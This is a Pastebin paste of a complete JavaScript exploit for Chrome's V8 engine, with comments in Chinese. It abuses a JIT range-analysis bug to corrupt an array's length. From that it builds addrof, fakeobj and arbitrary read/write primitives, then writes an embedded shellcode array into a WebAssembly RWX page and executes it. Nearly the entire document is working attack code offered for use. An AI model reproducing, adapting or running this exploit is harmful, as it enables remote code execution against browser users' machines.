xosski

Chrome var wasm_code

Oct 3rd, 2024
38
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.60 KB | None | 0 0
  1. var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
  2. var wasm_mod = new WebAssembly.Module(wasm_code);
  3. var wasm_instance = new WebAssembly.Instance(wasm_mod);
  4. var wasm_function = wasm_instance.exports.main;
  5. var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
  6.  
  7. let arb_write_buffer = new ArrayBuffer(0x300);
  8.  
  9. // 用来实现类型转换
  10. class Helpers {
  11. constructor() {
  12. this.buf =new ArrayBuffer(16);
  13. this.uint32 = new Uint32Array(this.buf);
  14. this.float64 = new Float64Array(this.buf);
  15. this.big_uint64 = new BigUint64Array(this.buf);
  16. }
  17.  
  18. // float-->uint
  19. f2i(f)
  20. {
  21. this.float64[0] = f;
  22. return this.big_uint64[0];
  23. }
  24. // uint-->float
  25. i2f(i)
  26. {
  27. this.big_uint64[0] = i;
  28. return this.float64[0];
  29. }
  30. // 64-->32
  31. f2half(val)
  32. {
  33. this.float64[0]= val;
  34. let tmp = Array.from(this.uint32);
  35. return tmp;
  36. }
  37. // 32-->64
  38. half2f(val)
  39. {
  40. this.uint32.set(val);
  41. return this.float64[0];
  42. }
  43.  
  44. hex(a) {
  45. return "0x" + a.toString(16);
  46. }
  47.  
  48. gc() { for(let i = 0; i < 100; i++) { new ArrayBuffer(0x1000000); } }
  49. }
  50.  
  51. function foo(flag) {
  52. // 触发漏洞,使得len==1且Range为(-4294967295, 0)
  53. let x = -1;
  54. if (flag) x = 0xFFFF_FFFF;
  55. let len = 0 - Math.max(0, x);
  56. // 利用array.shift()来构造出长度为-1(0xFFFFFFFE)的数组
  57. let vuln_array = new Array(len);
  58. vuln_array.shift();
  59.  
  60. let oob_array = [1.1, 1.2, 1.3];
  61.  
  62. if (flag) {
  63. //%DebugPrint(oob_array);
  64. //%SystemBreak();
  65. }
  66. return [vuln_array, oob_array];
  67. }
  68.  
  69. function confusion_to_oob() {
  70. console.log("[+] convert confusion to oob......");
  71. // 触发JIT
  72. for (let i=0; i<0x10000; i++) {foo(false);}
  73. // gc
  74. helper.gc();
  75. // 修改oob_array的length
  76. [vuln_array, oob_array] = foo(true);
  77. vuln_array[16] = 0xc00c;
  78.  
  79. console.log(" oob_array.length: " + helper.hex(oob_array.length));
  80. }
  81.  
  82. function addrof(obj) {
  83. vuln_array[7] = obj;
  84.  
  85. return helper.f2i(oob_array[0]) & 0xFFFF_FFFFn;
  86. }
  87.  
  88. function fakeobj(addr) {
  89. oob_array[0] = helper.i2f(addr);
  90.  
  91. return vuln_array[7];
  92. }
  93.  
  94. function get_arw() {
  95. console.log("[+] get absolute read/write access......");
  96.  
  97. let oob_array_map_and_properties = helper.f2i(oob_array[3]);
  98. point_array = [helper.i2f(oob_array_map_and_properties), 1.1, 1.2, 1.3];
  99. fake = fakeobj(addrof(point_array) - 0x20n);
  100. }
  101.  
  102. function arb_read(addr) {
  103. if (addr %2n == 0) {
  104. addr += 1n;
  105. }
  106. // 2n << 32n是为了填充length字段,在指针压缩下length的值会被改为0x1;
  107. // -8n是因为elements字段指向的内容会自动+8来跳过map和length
  108. point_array[1] = helper.i2f((2n << 32n) + addr -8n);
  109. return fake[0];
  110. }
  111.  
  112. function arb_write(addr, val) {
  113. if (addr %2n == 0) {
  114. addr += 1n;
  115. }
  116. // 2n << 32n是为了填充length字段,在指针压缩下length的值会被改为0x1;
  117. // -8n是因为elements字段指向的内容会自动+8来跳过map和length
  118. point_array[1] = helper.i2f((2n << 32n) + addr -8n);
  119. fake[0] = helper.i2f(BigInt(val));
  120. }
  121.  
  122. function get_wasm_rwx() {
  123. console.log("[+] get address of rwx page......");
  124. rwx_page_addr = helper.f2i(arb_read(addrof(wasm_instance) + 0x68n));
  125. //%DebugPrint(wasm_instance);
  126. //%DebugPrint(wasm_function);
  127. console.log(" Address of rwx page: " + helper.hex(rwx_page_addr));
  128. //%SystemBreak();
  129. }
  130.  
  131. function run_shellcode(addr, shellcode) {
  132. console.log("[+] run shellcode......");
  133. let dataview = new DataView(arb_write_buffer);
  134. let buf_addr = addrof(arb_write_buffer);
  135. let backing_store_addr = buf_addr + 0x14n;
  136. arb_write(backing_store_addr, addr);
  137. for (let i = 0; i < shellcode.length; i++) {
  138. dataview.setUint32(4*i, shellcode[i], true);
  139. }
  140. console.log("[+] success!!!");
  141. }
  142.  
  143. function exp() {
  144. helper = new Helpers();
  145.  
  146. confusion_to_oob();
  147. get_arw();
  148. get_wasm_rwx();
  149. run_shellcode(rwx_page_addr, shellcode);
  150. wasm_function();
  151. }
  152.  
  153. exp();
Add Comment
Please, Sign In to add comment